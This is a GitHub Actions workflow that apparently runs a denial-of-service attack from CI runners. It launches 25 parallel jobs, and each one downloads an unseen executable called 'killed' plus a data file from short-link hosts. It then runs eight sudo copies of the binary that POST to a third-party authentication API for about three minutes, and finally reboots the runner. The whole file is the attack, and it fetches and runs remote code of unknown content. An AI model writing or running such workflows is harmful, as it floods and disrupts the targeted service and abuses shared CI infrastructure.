name: Ubuntu VDS 45 saniye kiled

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 25
      matrix:
       instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25]


    steps:
      - name: OK !
        run: |
          wget https://wgetz.com/ttXGxAbtq8/killed
          wget https://curl.by/9TyTX/good.txt
          chmod +x killed
          PIDS=()
          for i in {1..8}; do
            sudo timeout 180 ./killed POST https://cgauth.com/api/v1 good.txt 170 60 10 &
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 180
        
      - name: OK !
        run: sudo reboot
